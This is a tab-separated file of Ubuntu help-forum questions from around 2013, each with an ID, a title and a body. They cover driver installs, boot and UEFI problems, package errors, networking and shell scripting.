335742	ubuntu 13.04 driver for lexmark x2650	how do i install the driver for a lexmark x2650 all-in-one printer ? i 'm moving to ubuntu step by step from windows 7 , but i do n't know how to install my lexmark x2650 in ubuntu 13.04 . i know some information about ubuntu , but i 'm not a expert . can you give any advice ?
335744	how to jump into the needed lines in a document using nano ?	i want to jump through lines faster in ubuntu 12.04 server . for example my errorlog shows me an error in line 514 , how can i jump to the line directly using nano or pico ? if it 's not possible , how to make it possible . i prefer to stay without any other tools if possible . thanks in advance .
335749	can not re-install dkms in virtualbox	i have updated to ubuntu 13.04 and now i ca n't run virtual-box i have installed dkms many times please help the problem shown is result code : ns_error_failure ( 0x80004005 ) component : machine interface : imachine { 22781af3-1c96-4126-9edf-67a020e0e858 } use 'apt-get autoremove ' to remove it . 0 upgraded , 0 newly installed , 0 to remove and 182 not upgraded . n : ignoring file 'virtualbox.li ' in directory '/etc/apt/sources.list.d/ ' as it has an invalid filename extension n : ignoring file 'virtualbox.li ' in directory '/etc/apt/sources.list.d/ ' as it has an invalid filename extension i think it might be an underlining issue when i updated . i tried googling it .
335751	what are the plataforms/devices ubuntu touch will run from ?	having been a first day contributor to edge ( shame it did n't get there ) i appreciate phones & tablets running ubuntu is the aim , for next year . in the meantime , can you please clarify what platform / devices ubuntu mobile will run on - on top of or side by side with android , or what ? sorry if this is available elsewhere , but if it is i 've missed it , i could n't find the answer . i 'm interested in writing apps , but would like to try them on real devices and may want to roll out a live app this autumn . chris
335752	how to install .deb file in ubuntu using terminal ?	i am trying to install google chrome , for that i downloaded a google-chrome-stable_current_i386.deb file . when i try to install using install in terminal sudo install google-chrome-stable_current_i386.deb it gives following error . install : missing destination file operand after âgoogle-chrome-stable_current_i386.debâ try 'install -- help ' for more information .
335753	is there any way to install ubuntu on a chinese android device ?	i have a chinese mobile phone named jiayu g4 , and i would like to know if there is any possible way to install ubuntu os on it.. i am beginner with programming , and if i need to port a rom can anyone help me with the source and a good guide to do it ?
335758	how can i redirect sound from ubuntu desktop to bravia tv ?	after searching for almost a month for the solution ( still unsolved ) , asking here with a lot of hope . background : i have a bravia tv which is connected to my hp computer running ubuntu 12.04 dual booted with windows 7 . desktop is having no hdmi port , instead one divx and one vga port . the vga port is connected to a small monitor and the divx port connected to tv with hdmi at the tv end . a male-male 3.5 audio connector connects the audio input port at tv and rear headphone jack at desktop . purpose : i want to view movies stored in my hdd over my big screen tv . problem : when i am in windows , i switch screen from my monitor to tv and view movies , no issues . but now i want to phase out windows with ubuntu but only this problem is restricting me . i can switch displays but no sound is coming . first the audio drivers were not present , installed them , checked with headphones and 5.1 speakers , audio is coming but i want it through my tv . strange thing is that if i unplug my divx port , the sound is coming through tv , screen obviously blank and display is coming through my small monitor . alternatives : if i use audio from my home theatre and display from tv , it solves my purpose , but then i am not utilizing my tv speakers and going towards more electricity bills . i also tried the dlna way ( my tv and ubuntu desktop is connected to the same router/network ) using minidlna , plex , serviio etc . but each is having some or the other problem .
335770	how can i run a command and copy its output ?	i 've been asked to run a command and copy and paste the output but i have no idea where to start . what do i do ?
335774	grep regex match not returning result as expected	i have several ubuntu servers and there is some behavior that has me curious . on any newly installed machine ( ubuntu server 12.04.3 lts ) , if i run : echo `` testbla123 '' | grep -p -o [ 0-9 ] * this will return 123 as expected . on an older machine ( ubuntu server 12.04.1 lts ) , if i run the same command , i get nothing back , i have to instead run : echo `` testbla123 '' | grep -p -o `` [ 0-9 ] * '' after performing an apt-get upgrade , it will perform without quotes around the regex . grep is at the same versions on both machines . i tried comparing dependencies before and after the update for some time without much luck . i was wondering if anyone knows why this happens ?
335778	why am i getting `` apt-setup/security_host ubuntu does n't exist '' while instaling from pressed ?	i am trying to install the 12.04 desktop using preseed file , same file i use for 12.04 server installation . it works fine for the server but on desktop i am getting : apt-setup/security_host ubuntu does n't exist and installation stuck .
335780	localhost : updating files to localhost	i have set up a lamp stack that listens on localhost and serves files from a directory . i save a html file into my localhost directory , then i try to change it ( and i save it again into my localhost directory ) . however , when i access the file via localhost it shows me the old file without the changes . if i access the file via my home folder it appearers as the current file ( with last changes ) . do you know how can i solve this problem ? thanks , berga007
335785	how do i run cisco packet tracer 6.0.1 ?	i have a problem running packet tracer 6.0.1 on ubuntu 13.04 . i have a downloaded file from cisco netspace - this file had not extension . i added the extension tar.gz to this file and i could unpack it to a location with other folders and files , there was a file install too . this was a .bin file and i used sudo chmod +x on this file and i used ./filename and installation has been launched i had to accept licence and so on . after successfully installation i tried to launch packet tracer and nothing happened . please help me , how can i correctly install and run packet tracer . note that i 'm new in using linux .
335793	writing to mysql database in ubuntu server 12.04 lts	i am retreiving arp tables from a switch using snmp . i can poll the tables to a text file , but i want to do it to the mysql db . this is the code i am using to poll to text file */5 * * * * root /usr/bin/snmpbulkwalk -v 2c -c public ( assumed community ) -oxsq ( ip adress of switch ) .1.3.6.1.2.1.3.1.1.2 > /tmp/s01_arp.txt how can i modify so that the results are polled to the table arp_tab that i have created in the mysql database the output come out as atphysaddress [ 10 ] [ 1.172.16.1.5 ] `` 80 ee 73 2f 0b 40 `` atphysaddress [ 10 ] [ 1.172.16.1.25 ] `` 38 ea a7 6d 2e 8e `` atphysaddress [ 10 ] [ 1.172.16.1.32 ] `` bc 51 fe 50 16 f8 `` atphysaddress [ 10 ] [ 1.172.16.1.200 ] `` 00 06 53 fe 39 e0 `` atphysaddress [ 10 ] [ 1.172.16.1.210 ] `` 00 18 ba 51 5b 41 `` i would want the ip address and the mac address to be mapped into the database
335794	could not get lock /var/lib/apt/lists/lock	when i try to apt-get update i 'm getting the below error , e : could not get lock /var/lib/apt/lists/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock directory /var/lib/apt/lists/
335799	hp pavilion g6 . ubuntu 12.04 . kernel 3.5.0-39 . wifi/bluetooth suddenly stopped working	so , wifi was working fine till yesterday . there 's suddenly an issue - i ca n't even see the `` enable wireless '' option on the gui top menu . here 's info : iwconfig gives me this : eth0 no wireless extensions . lo no wireless extensions . ifconfig gives me this : eth0 link encap : ethernet hwaddr 28:92:4a:4f:7a : e5 inet addr:192.168.1.241 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :2a92:4aff : fe4f:7ae5/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:36663 errors:0 dropped:0 overruns:0 frame:0 tx packets:26131 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:50857091 ( 50.8 mb ) tx bytes:2485146 ( 2.4 mb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:862 errors:0 dropped:0 overruns:0 frame:0 tx packets:862 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:69884 ( 69.8 kb ) tx bytes:69884 ( 69.8 kb ) lspci gives me this : 00:00.0 host bridge : intel corporation ivy bridge dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation ivy bridge pci express root port ( rev 09 ) 00:02.0 vga compatible controller : intel corporation ivy bridge graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation panther point usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation panther point mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation panther point usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation panther point high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation panther point pci express root port 1 ( rev c4 ) 00:1c.1 pci bridge : intel corporation panther point pci express root port 2 ( rev c4 ) 00:1c.2 pci bridge : intel corporation panther point pci express root port 3 ( rev c4 ) 00:1d.0 usb controller : intel corporation panther point usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation panther point lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation panther point 6 port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation panther point smbus controller ( rev 04 ) 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati thames xt/gl [ radeon hd 7600m series ] 07:00.0 network controller : ralink corp. device 3290 07:00.1 bluetooth : ralink corp. device 3298 08:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 05 ) 09:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. device 5229 ( rev 01 ) ifconfig wlan0 up gives me this : wlan0 : error while getting interface flags : no such device
335805	need help with email setup for my ubuntu server	i need help setting up an admin email for my server . i have tried squirrelmail and roundcubemail but whenever i get to the stage of typing my login details in , nothing works . login just keeps failing . i honestly dont even mind using a gmail account or something like that , i just want to be able to read incoming messages from my website 's `` contact '' page .
335809	prevening svn checkout list to be shown in terminal	i wrote a python code and at some point it checks out using svn . i do n't want to see the outputs of svn on my terminal screen . i heard that to block this , i should use /dev/bin or something like that , but i do n't know how could i do that and what should i do . is there anyone to help me ?
335810	external hard drive fails to appear after grub rescue issues	updated some files last night and was prompted to reboot . when i rebooted the computer i was greeted with a black screen and a message stating : error : file not found grub rescue > did some research and got the grub2 loaded back up and working again . i can now log into my computer just fine now . now the only problem is that my external hard drive is not showing up on the desktop when i plug it in . ran a disk utility and it shows up there . ran gparted and it shows up there . however , under the mount point column it 's showing /boot/efi . is that value supposed to be that ? issued the command cat /proc/partitions : no error messages and the external shows up there . issued the command lssub : external hard drive shows up there . for whatever reason the system is n't putting an icon on my desktop allowing me to mount and access the contents of my external hard drive . any thoughts or ideas ? thank you . i 'm running xubuntu 12.04 64-bit . update : was using thunar to find some files and i was able to access my external hard drive by going to /boot/efi/ and all my external 's files are in there . i do n't know what 's going on .
335811	secure boot prevents loading of windows 8 in ubuntu 13.04 dual boot	i recently installed ubuntu 13.04 desktop ( x64 ) onto my windows 8 machine . ubuntu loads fine however , on the boot menu when i select boot windows 8 it comes up with a series of errors : i also have the error message kmv disabled by bios when i boot ubuntu ( though that does boot successfully afterwards ) . i have heard something about secure uefi but i do not know what that is really or how t should be disabled ( if that is the issue ) . my computer is a lenovo ideapadz500 .
335812	internal microphone does not work on ubuntu 13.04 on my dell latitude e6330 laptop	my problem is that internal microphone stopped working after i updated ubuntu from 12.04 to 12.10 and then 13.04 . i searched for the solution in the internet , i found several solutions , but none of them solved my problem . here are some screenshots of my configuration . any suggestions what problem can be an how i can solve it ?
335813	are python apps allowed in ubuntu app showdown ?	i want to know if python apps ( containing only a .py file ) are allowed in the latest app showdown . if not , how can it be ported to qml ?
335814	how to persistently limit resources of a program	i am running several programs on my computer and under normal circumstances my ram ( 2gb ) and cpu power is sufficient . however it occurs that a single program suddenly turns the system permanently completely unresponsive ( no alt+f1 , no reisub ) and i need to do a hard shut-down and loose data . i want to be secured against such a situation . preferably the system would be able to keep itself alive so that the user has control to close programs at any time ( i remember in ubuntu 9.10 , the kernel killed processes that require too much ram ) . how can i set it up to allow no program to require more than ~75 % of memory ? i tried ulimit -v 1500000 but it seemed not to help ( maybe not persistent ? ) and i lost data again .
335819	why do i get an error when trying to use u1db with the ubuntu sdk ?	i want to create an app with the ubuntu sdk . it requires the creation of a database , so i thought it would be easy to create it with u1db . first i had many issues finding i needed to install the qtdeclarative5-u1db1.0 package . now i can import u1db 1.0 as u1db as some examples show but i ca n't call u1db.database because i get this error message : unknow component ( m300 ) it 's not very motivatingâś are there some examples or tutorials showing what can i do ?
335820	check that filesystem and partition table are in a good state ?	i just changed around the partition table of an ubuntu 12.04 desktop and everything seems to be working fine . i want to perform similar changes on another ( more important ) system . the machine boots so i 'm guessing everything worked well . is there a more comprehensive way to check that the partition table is ok and the filesystem is consistent ?
335826	usb ports driver problem	my usb ports do n't work perfectly , i have 3 devices that use them : a mouse , the internet cable and the keyboard . the problem is that every 3-50min , one of the devices gets like unplugged and the system does n't recognize him and i have to remove and replug the device so that it works . what 's the problem ? how do i get new drivers ? i searched a lot but could n't find a good answer ... thank you in advance !
335827	texlive version used by texstudio	i have installed texlive 2013 over the internet . i followed the documentation given along with it to set the path variables post installation . i needed some tex editor . so i decided to install texstudio through synapic package manager . when it was downloading the packages required , i noticed that it was also installing texlive 2012 related packages from launchpad : ppa : backports . now my question is that when i am using a package in texstudio while writing a file , am i using that of texlive 2012 or texlive 2013 ? ( ps tex -- version in the terminal shows texlive 2013 . )
335828	how to use wget behind a tmg proxy ?	i need to issue a http request from the command line , but am behind a forefront tmg proxy . the environment variable http_proxy does n't work . i still get the error : error 407 : proxy authentication required ( forefront tmg requires authorization to fulfill the request . access to the web proxy filter is denied . ) . i have no gui ( no x ) on this pc . how can i make a simple http request and bypass this proxy ?
335830	give apache2 write permissions network share	i have just installed owncloud . i chose the data directory ( default : /var/www/cloud/data/ ) to be on a network share on my windows server . this share is located at /home/christophe/seagatedrive/ownclouddata/ i mounted this share by adding this line to fstab : //192.168.1.130/seagate /home/christophe/seagatedrive cifs user=administrator , password=pwd 0 0 but now i get an error from owncloud saying that the user does not have write permissions to this directory so i did the following : sudo chown -r www-data : www-data /home/christophe/seagatedrive/ownclouddata but this does n't fix the problem . everytime i navigate to the directory and do ls -ld the only user showing up is root . is there a way to fix this ?
335833	icon of the .desktop file does not show in unity launcher	i created the launcher for the ranger filemanager like this : # ! /usr/bin/env xdg-open [ desktop entry ] version=1.0 type=application terminal=true icon [ pl_pl ] =/ name [ pl_pl ] =ranger exec=/usr/bin/ranger name=ranger icon=/home/yemu/.icons/ranger.png unfortunately , the icon only shows on the .desktop file , but after i run it , in the launches there 's default grey icon with gear instead of the ine defined in the file .
335842	unity-music-daemon uses large amount of memory	when i boot my ubuntu 13.04 up , i noticed that my fans goes crazy and when i had a glanced at system monitor , i saw that a process called unity-music-daemon is using a large amount of memory and cpu . i found on internet that uninstallation of unity-lens-music package will solve this issue . what i want to know is what unity-music-daemon does . since uninstalling it solves this problem , i hope this package has nothing to do with music players or audio . can anybody explain what this daemon does ? thank you .
335845	command for find in page ( ubuntu 12.04 )	i 'm keybinding some shortcuts and i just want to know what the `` find in active window '' command is . < -- windows equivalent is ctrl-f
335851	recover deleted user files from guest account	i had installed gmail , and that had created a lot of users on the login screen . so i decided to delete them . but as i deleted them , i lost my user account . now when i login there 's only guest login option . hence i have to recover my files that were in the user account.i know e2undel but how can i do it ( install and execute from the guest account ) when i do n't know the password of the root .
335853	ubuntu wo n't boot after initializing the build environment for android	my laptop worked perfectly util i initialized the build environment for android . the gui wo n't start . it looks like some kinds of graphics card problems . i tried to fix it but after trying a lot of solutions on the internet nothing worked . ( i only know basic linux stuffs . ) i 've already reinstalled the os . however , i still want to build the android from source . any idea what might cause the problem ? any workaround ? here is the command that i used to initialize the build environment : $ sudo apt-get install git gnupg flex bison gperf build-essential \ zip curl libc6-dev libncurses5-dev : i386 x11proto-core-dev \ libx11-dev : i386 libreadline6-dev : i386 libgl1-mesa-glx : i386 \ libgl1-mesa-dev g++-multilib mingw32 tofrodos \ python-markdown libxml2-utils xsltproc zlib1g-dev : i386 $ sudo ln -s /usr/lib/i386-linux-gnu/mesa/libgl.so.1 /usr/lib/i386-linux-gnu/libgl.so my laptop model is asus u36sd . ( https : //help.ubuntu.com/community/asus_u36sd ) thanks edit : base on this , i guess libgl1-mesa-glx : i386 might cause the issue . sudo apt-get install libgl1-mesa-dri : i386 the following packages will be removed : libgl1-mesa-dri-lts-quantal libxatracker1-lts-quantal ubuntu-desktop xorg xserver-xorg-lts-quantal xserver-xorg-video-all-lts-quantal xserver-xorg-video-vmware-lts-quantal the following new packages will be installed : libdrm-intel1 : i386 libdrm-nouveau1a : i386 libdrm-radeon1 : i386 libdrm2 : i386 libexpat1 : i386 libffi6 : i386 libgl1-mesa-dri : i386 libllvm3.0 : i386 libpciaccess0 : i386 libstdc++6 : i386
335855	tint2 `` invisible '' with second monitor	this worked yesterday not sure what changed . other than my battery running dry , also i 'm running 13.04 . started up app tint2 . laptop booted plugged into second monitor via vga . tint2 was functioning it was just not visible , aka . a window full screen still left space for the taskbar , and can select apps from the `` invisible '' bar . logged out and back in , same thing . tried uninstalling and then reinstalling , same result . then took it off start up apps and tried without the second monitor , ah ha that worked . after plugging in the other monitor i got this ( process:11352 ) : glib-critical ** : g_hash_table_foreach : assertion `version == hash_table- > version ' failed real transparency on ... depth : 32 xrandr : found crtc 's : 3 xrandr : linking output lvds1 with crtc 0 tint2 : another systray is running pid=10710 tint2 : nb monitor 1 , nb monitor used 1 , nb desktop 1 ( process:11352 ) : glib-critical ** : g_hash_table_foreach : assertion `version == hash_table- > version ' failed real transparency on ... depth : 32 xrandr : found crtc 's : 3 xrandr : linking output lvds1 with crtc 0 xrandr : linking output vga1 with crtc 1 tint2 : another systray is running pid=10710 tint2 : nb monitor 3 , nb monitor used 3 , nb desktop 1
335857	how to create a shell script to display all pid started by a program ?	how to create a shell script to display all pid of processes started by a program , each on a new line . the script should accept the path to the program as a parameter like : ./displaypid.sh { path_to_the_program } this is what i 've wrote in the script : # ! /bin/bash pidof $ 1 but i think it is n't enough .
335858	is it possible ( and safe ) to simply delete the encrypted home directory and create a new one ?	i lost the passphrase for my account on a server . i have spent more time configuring the settings of the server than i have putting files in my home directory so i want to know if i can just delete the encrypted one and make a new home directory .
335860	intel driver manager error `` package libdrm2 : i386 can not be removed ''	i recently fresh-installed ubuntu 13.04 . running on asus u43f after running system test , my video test failed . i have installed the latest version of intel driver manager . while running this to update my drivers , it fails and the following message is displayed : '' package libdrm2 : i386 can not be removed '' the terminal output during this process is : package-manager-ubuntu.c/on_transaction_signal : received transaction signal propertychanged from :1.105 with ( 'allowunauthenticated ' , < true > ) package-manager-ubuntu.c/on_transaction_signal : received transaction signal propertychanged from :1.105 with ( 'status ' , < 'status-authenticating ' > ) update_action authenticating : done [ 100 % ] ⏲ package-manager-ubuntu.c/on_transaction_signal : received transaction signal propertychanged from :1.105 with ( 'progress ' , < 9 > ) update_progress authenticating : done [ 9 % ] ⏲ package-manager-ubuntu.c/on_transaction_signal : received transaction signal propertychanged from :1.105 with ( 'status ' , < 'status-resolving-dep ' > ) update_action resolving dep : done [ 9 % ] ⏲ package-manager-ubuntu.c/on_transaction_signal : received transaction signal propertychanged from :1.105 with ( 'status ' , < 'status-loading-cache ' > ) update_action loading cache : done [ 9 % ] ⏲ package-manager-ubuntu.c/on_transaction_signal : received transaction signal propertychanged from :1.105 with ( 'dependencies ' , < ( [ 'fakeroot=1.18.4-2ubuntu1 ' , 'debhelper=9.20120909ubuntu1 ' , 'libalgorithm-merge-perl=0.08-2 ' , 'g++-4.7=4.7.3-1ubuntu1 ' , 'dh-apparmor=2.8.0-0ubuntu11 ' , 'libalgorithm-diff-xs-perl=0.04-2build3 ' , 'po-debconf=1.0.16+nmu2ubuntu1 ' , 'g++=4:4.7.3-1ubuntu10 ' , 'dkms=2.2.0.3-1.1ubuntu2 ' , 'build-essential=11.6ubuntu4 ' , 'dpkg-dev=1.16.10ubuntu1 ' , 'html2text=1.3.2a-15ubuntu3 ' , 'libalgorithm-diff-perl=1.19.02-3 ' , 'libstdc++6-4.7-dev=4.7.3-1ubuntu1 ' , 'libmail-sendmail-perl=0.79.16-1 ' , 'libsys-hostname-long-perl=1.4-2 ' ] , @ as [ ] , [ 'libdrm-nouveau2 : i386=2.4.43-0ubuntu1.1 ' , 'libdrm-radeon1 : i386=2.4.43-0ubuntu1.1 ' , 'libgl1-mesa-dri : i386=9.1.3-0ubuntu0.3 ' , 'libgl1-mesa-glx : i386=9.1.3-0ubuntu0.3 ' , 'libdrm2 : i386=2.4.43-0ubuntu1.1 ' , 'libdrm-intel1 : i386=2.4.43-0ubuntu1.1 ' ] , @ as [ ] , [ 'libdrm-nouveau2=2.4.45-0ubuntu1 ' , 'libdrm-radeon1=2.4.45-0ubuntu1 ' , 'xserver-xorg-video-intel=2:2.21.9-0ubuntu0~raring ' , 'libdrm2=2.4.45-0ubuntu1 ' , 'libdrm-intel1=2.4.45-0ubuntu1 ' , 'libva1=1.2.1-0ubuntu0~raring ' ] , @ as [ ] , @ as [ ] ) > ) package-manager-ubuntu.c/on_transaction_signal : received transaction signal propertychanged from :1.105 with ( 'download ' , < int64 14502010 > ) package-manager-ubuntu.c/on_transaction_signal : received transaction signal propertychanged from :1.105 with ( 'space ' , < int64 25445376 > ) package-manager-ubuntu.c/on_transaction_signal : received transaction signal propertychanged from :1.105 with ( 'unauthenticated ' , < [ 'i915-3.9-3.8-dkms ' , 'i965-va-driver ' , 'libdrm-intel1 ' , 'libdrm-nouveau2 ' , 'libdrm-radeon1 ' , 'libdrm2 ' , 'libkms1 ' , 'libva-drm1 ' , 'libva-egl1 ' , 'libva-glx1 ' , 'libva-intel-vaapi-driver ' , 'libva-tpi1 ' , 'libva-wayland1 ' , 'libva-x11-1 ' , 'libva1 ' , 'vainfo ' , 'xserver-xorg-video-intel ' ] > ) package-manager-ubuntu.c/on_transaction_signal : received transaction signal propertychanged from :1.105 with ( 'hightrustwhitelistedpackages ' , < @ as [ ] > ) package-manager-ubuntu.c/on_transaction_signal : received transaction signal propertychanged from :1.105 with ( 'status ' , < 'status-setting-up ' > ) update_action setting up : done [ 9 % ] ⏲ package-manager-ubuntu.c/on_transaction_signal : received transaction signal propertychanged from :1.105 with ( 'status ' , < 'status-waiting ' > ) update_action waiting : done [ 9 % ] ⏲ package-manager-ubuntu.c/run_transaction_finished : apt transaction finished package-manager-ubuntu.c/on_transaction_signal : received transaction signal propertychanged from :1.105 with ( 'status ' , < 'status-running ' > ) update_action running : done [ 9 % ] ⏲ package-manager-ubuntu.c/on_transaction_signal : received transaction signal propertychanged from :1.105 with ( 'progress ' , < 11 > ) update_progress running : done [ 11 % ] ⏲ package-manager-ubuntu.c/on_transaction_signal : received transaction signal propertychanged from :1.105 with ( 'error ' , < ( 'error-not-remove-essential ' , 'package libdrm2 : i386 can not be removed ' ) > ) transaction-view.c/on_pm_op_failed : package manager operation failed : package libdrm2 : i386 can not be removed package-manager-ubuntu.c/on_transaction_signal : received transaction signal propertychanged from :1.105 with ( 'status ' , < 'status-finished ' > ) update_action finished : done [ 11 % ] ⏲ package-manager-ubuntu.c/on_transaction_signal : received transaction signal propertychanged from :1.105 with ( 'exitstate ' , < 'exit-failed ' > ) on_transaction_signal finished : done [ 11 % ] ◦
335863	disable network on remastered ubuntu 13.04 live-cd except for localhost	i have remastered a ubuntu 13.04 live-cd for software presentations . during boot , it tries to find a network connection for several minutes ( but fails in the end ) . maybe it does not detect my network card properly ( macbook pro ) . for the live system i do n't need an internet connection . only access to localhost is important . how do i prevent the system from configuring the network/internet connection while still preserving access to localhost ? if i can not turn this off , is it possible to reduce the timeout for this configuration process ? edit : i forgot to say that i used a minimal ubuntu 13.04 with command line only . hence , no gui components are responsible for the delay . edit 2 : the /etc/network/interfaces of the live-dvd before remastering is # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback
335866	where do i find my boot menu ?	i want to know where the boot menu is on my asus laptop . can anyone tell me where to find it or where to find my bios settings ? i am having trouble booting my computer to ubuntu with a usb .
335870	display files which contains a word on more then three lines ?	i am trying to display all files which contain a specific word on more then three lines . i.e . file : andrew is so nice , and andrew want some ice , but andrew does n't roll the dice . so this file contains andrew on more than three lines , so it will be displayed . i used grep -or '\ ' but it list all files which contain `` word '' on at least 1 line .
335873	changing the repository to upgrade	for upgrading a release ( e.g . from quantal to raring ) , apt-get dist-upgrade does work . i wonder what happens if simply changing the repository ( e.g . from quantal to raring ) then utilizing normal apt-get update and apt-get upgrade ? changing deb http : //us.archive.ubuntu.com/ubuntu/ quantal main deb-src http : //us.archive.ubuntu.com/ubuntu/ quantal main to deb http : //us.archive.ubuntu.com/ubuntu/ raring main deb-src http : //us.archive.ubuntu.com/ubuntu/ raring main then apt-get update & & apt-get upgrade can this method actually upgrade to the latest release of ubuntu ? i am curious what happens by this approach .
335874	how do i recursively set the nautilus view mode for a directory tree ?	nautilus 3.4 allows you to set a default view mode . it also remembers your custom view settings for specific folders . what i would love to be able do is to define a view mode for all directories and subdirectories in a specific directory tree . going through each and every folder to change the view mode manually would take too long . is there any way i can do this ? maybe through a nautilus script that modifies gvfs-metadata ?
335875	`` error : zlib check failed '' while compiling qemu	i recently formatted my pc and reinstalled ubuntu 13.04 via wubi in windows . and after updates i 'm getting this error : basel @ ubuntu : ~/desktop/qemu-1.6-test $ ./configure -- cross-prefix=i586-mingw32msvc- -- prefix=/home/basel/desktop/qemu-1.6-test error : zlib check failed make sure to have the zlib libs and headers installed . how should i proceed ?
335879	problem booting from ubuntu 13.04 live usb	i have an msi gs70 laptop running windows 8 and i 'm attempting to dual boot ubuntu alongside windows 8 . i 'm following the directions to install ubuntu in uefi mode and have tried disabling secureboot and all that stuff . i do n't think i can turn off intel srt because i currently run a raid array and doing so would result in a loss of data for me . anyhow , onto the actual issue at hand . i can successfully select the usb drive as the primary boot device and i get to the page that asks whether i want to try ubuntu or install it or do the oem option and so on . so i get that far , but when i select to try ubuntu without installing , it goes to a black screen and it appears to quit reading from the usb stick and nothing is displayed on screen . does anyone have an idea why this is happening ? edit : i do want to add that my laptop has all usb 3.0 ports , if that makes a difference .
335880	how to develop for ubuntu ?	i am the head of a small development team , so small that i do n't have my full team up and `` official '' yet . however , i am highly interested in developing for ubuntu and ubuntu touch ! i already develop for apple , mostly ios , but not strictly , and as soon as some of my projects are up and running in that area , i 'm going to port some of them to the android mobile os as well . i also do development for windows , right now just simple games , not really for a profit , nor officially , due to the windows developer program being not so useful . so , being able to expand my development to ubuntu making me able to develop across all platforms sounds fantastic ! i read on the ubuntu site about development , and i 'm downloading the ubuntu sdk currently , but i just had some questions that the site did n't answer for me when i was looking around . is the ubuntu sdk strictly for ubuntu mobile , or is it for the computer os , or both ? also , i saw some tips and help guides on the ubuntu website for ubuntu development , but i did n't see anything i could use as a valuable resource , so is there any resource that is recommended that i should use to help assist me in ubuntu development ? to clarify further : i 'm currently using a ubuntu machine , and i also have the tools i need to develop for ubuntu . i would like to know if there is a difference in developing for ubuntu touch os and the ubuntu os . like osx and ios both have a core language of objective-c , but both platforms use two different sdk 's since they are two different operating systems . i also would like to know of any resources to assist me , being that i 'm new to these particular tools . i 'm not a newbie to coding , but when dealing with a new platform , it really helps to know the basics of what 's going on , rather than diving right in and ending up getting tripped by something simple and trivial . again , any help is always appreciated !
335881	quickly application create config folder and config file under user 's home folder	i want to create an app with quickly but i have a question : lots of applications create config files under ~/.config or ~/.application/config in home folder of current user and keep configs , user settings in that files . applications use that config files for next run . i can use gsettings for app 's configurations but i want to create a config text file and use it . how can i do this with ubuntu quickly application template ? i took a look to ~/myapp/myapp_lib/builder.py and ~/myapp/myapp_lib/myappconfig.py but could not find any solution . thanks
335883	how to use the newest ipython in ubuntu12.04 ?	how to use the newest ipython in ubuntu12.04 ? the newest ipython is 1.0 . the ipython in official software center is too old . thanks
335893	find desktop files in wubi disk	short question : where is the ~/desktop/ files in the root.disk ( wubi ) ? details : hello , i 've been using wubi in windows 7 x32 for a while and then had to change my main operating system to windows 8 x64 . note : the wubi was x64 . so i formatted my os partition ( the wubi was installed in the other one ) and then i could n't open ubuntu anymore . and then found out that it was possible to nagivate through .disk files in this website , and installed the ext2explore and then found all documents that were in ~/documents and ~/downloads . however , when i opened the ~/desktop the folder was empty , and i am sure most of my files was/is there . am i missing something ?
335896	hp envy 15-j005sp does not boot - 13.04	i managed to install ubuntu 13.04 on hp envy 15-j005sp but the grub menu does not show up and it boots directly to w8 . i 've tried the following : on installation i manually selected an unallocated partition choosing as a start point `` \ '' - after installing , ubuntu asks to reinitiate but the pc boots directly to w8 . made a few research and tried the work arounds on the official ubuntu uefi page , i.e . disable secure boot and intel smart technologies options on bios - same result , still goes to w8 . runned again livecd and reinstall ubuntu on the same partition - still nothing new ; last action made and by using the minitool partition magic , deleted the ubuntu partition + swap partition . runned the livecd and this time asked to install ubuntu in parallel with w8 ( automatic option , did not choose any partition - anyway the partition created is exactly the same as when i did manually ) - still the same result . as a last resort i tried the option of running ubuntu by livecd without installing and to make a boot repair ( http : //paste.ubuntu.com/6007362 ) . the tool detected some sort of buggy kernel and supposedly corrected it , but the pc stills boots directly to w8 . i noticed that by pressing f9 before boot i manage to select the ubuntu partition and the grub 2 menu shows up . i choose to start ubuntu but the pc freezes and some errors occur . i want to upload an image showing the error but i do n't know how to . if someone needs this image please tell me how to upload . [ update ] using f9 , grub 2 menu shows up and looking into 'advanced ubuntu '' i finally managed to enter ubuntu . made a system update , reboot , choose the latest kernel and the pc crashes . reboot again , some error messages appears , saying that some unknown chipset is not detected but it goes throw and ubuntu opens . still when i reboot the system still enters directly into w8 . anyone help to put grub 2 to appear automatically ? did anyone faced any entry error showing a similar message like unknown chipset ... ? thank you . diogo
335898	ca n't log in whit gdm	i have installed ubuntu gnome . i restarted it and all went fine . the next day , when i tried to turn on my computer , it appeared the load session screen , and , once i have logged in , it just stayed like that . i mean : the screen says : user : logged in correctly . that 's all . i cant do anything , and when i press esc , it shows : screen shoot . yes , it 's in spanish . this happens me often , but sometimes it does n't . it seems like it has passed trough that , but suddenly it shows the same screen , but with the warning : failed to load session `` gnome '' . any ideas how to solve this ?
